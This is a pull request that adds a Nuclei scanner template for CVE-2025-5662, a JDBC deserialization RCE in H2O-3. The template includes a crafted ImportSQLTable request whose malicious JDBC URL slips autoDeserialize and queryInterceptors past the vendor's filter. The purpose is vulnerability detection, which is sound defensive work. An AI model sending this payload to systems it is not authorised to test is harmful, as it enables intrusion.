### PR TITLE
Add CVE-2025-5662 - H2O-3 JDBC Deserialization RCE

### DIFF
--- a/http/cves/2025/CVE-2025-5662.yaml
+++ b/http/cves/2025/CVE-2025-5662.yaml
@@ -1,0 +1,95 @@
+id: CVE-2025-5662
+
+info:
+  name: H2O-3 - JDBC Deserialization Remote Code Execution
+  author: security-researcher
+  severity: critical
+  description: |
+    A deserialization vulnerability exists in the H2O-3 REST API endpoint POST /99/ImportSQLTable that affects all versions up to 3.46.0.7. The vulnerability allows remote code execution due to improper validation of JDBC connection parameters when using a MySQL Key-Value format. The vulnerable regex `[?;&]([a-z]+)=` fails to detect dangerous parameters inside `jdbc:mysql://(host=...,param=value,...)` syntax, allowing attackers to bypass the filter and pass autoDeserialize, queryInterceptors, and other malicious JDBC parameters.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary code on H2O-3 clusters by crafting malicious JDBC connection URLs. Successful exploitation leads to complete system compromise with the privileges of the H2O-3 process.
+  remediation: |
+    Upgrade H2O-3 to version 3.46.0.8 or later. The fix implements proper validation and sanitization of JDBC connection parameters to prevent deserialization attacks.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-5662
+    - https://huntr.com/bounties/057a743b-b2ec-4312-8262-ce0ff8bc161c
+    - https://github.com/h2oai/h2o-3/commit/f714edd6b8429c7a7211b779b6ec108a95b7382d
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-5662
+    epss-score: 0.02096
+    epss-percentile: 0.84099
+    cwe-id: CWE-502
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: h2oai
+    product: h2o-3
+    shodan-query: "H2O-3"
+  tags: cve,cve2025,h2o,h2o-3,rce,deserialization,jdbc,unauth
+
+http:
+  - raw:
+      - |
+        GET /3/Cloud HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+
+      - |
+        POST /99/ImportSQLTable HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: application/json
+
+        connection_url=jdbc%3Amysql%3A%2F%2F(host%3D127.0.0.1%2Cport%3D3308%2CautoDeserialize%3Dtrue%2CqueryInterceptors%3Dcom.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor%2Cuser%3Ddeser_CUSTOM%2CmaxAllowedPacket%3D655360)&table=test&username=root&password=root
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - '"schema_name":"CloudV3"'
+          - '"version":"3.'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+          - "status_code_2 == 200"
+        condition: and
+
+      - type: word
+        part: body_2
+        words:
+          - '"schema_name":"JobV3"'
+          - '"status":"RUNNING"'
+        condition: and
+
+      - type: word
+        part: body_2
+        words:
+          - "Potentially dangerous JDBC parameter found"
+        negative: true
+
+      - type: word
+        part: body_2
+        words:
+          - '"schema_name":"H2OErrorV3"'
+        negative: true
+
+    extractors:
+      - type: regex
+        part: body_1
+        group: 1
+        name: h2o_version
+        regex:
+          - '"version":"([^"]+)"'
+
+      - type: regex
+        part: body_2
+        group: 1
+        name: job_id
+        regex:
+          - '"name":"([^"]+)","type":"Key<Job>"'

--- a/http/cves/2025/CVE-2025-5662.yaml
+++ b/http/cves/2025/CVE-2025-5662.yaml
@@ -2,7 +2,7 @@ id: CVE-2025-5662
 
 info:
   name: H2O-3 - JDBC Deserialization Remote Code Execution
-  author: security-researcher
+  author: tx1ee
   severity: critical
   description: |
     A deserialization vulnerability exists in the H2O-3 REST API endpoint POST /99/ImportSQLTable that affects all versions up to 3.46.0.7. The vulnerability allows remote code execution due to improper validation of JDBC connection parameters when using a MySQL Key-Value format. The vulnerable regex `[?;&]([a-z]+)=` fails to detect dangerous parameters inside `jdbc:mysql://(host=...,param=value,...)` syntax, allowing attackers to bypass the filter and pass autoDeserialize, queryInterceptors, and other malicious JDBC parameters.


### PR DESCRIPTION
### Summary

This PR adds a nuclei template for CVE-2025-5662.

- **CVE-2025-5662**: H2O-3 JDBC Deserialization Remote Code Execution
  - CVSS: 9.8 (Critical)
  - CWE: CWE-502
  - Affected: H2O-3 <= 3.46.0.7
  - Fixed: H2O-3 >= 3.46.0.8

### References

- https://nvd.nist.gov/vuln/detail/CVE-2025-5662
- https://huntr.com/bounties/057a743b-b2ec-4312-8262-ce0ff8bc161c
- https://github.com/h2oai/h2o-3/commit/f714edd6b8429c7a7211b779b6ec108a95b7382d

### Verification

Template was verified against local H2O-3 Docker environments:
- Vulnerable version 3.46.0.7: Detected successfully
- Fixed version 3.46.0.8: No false positives

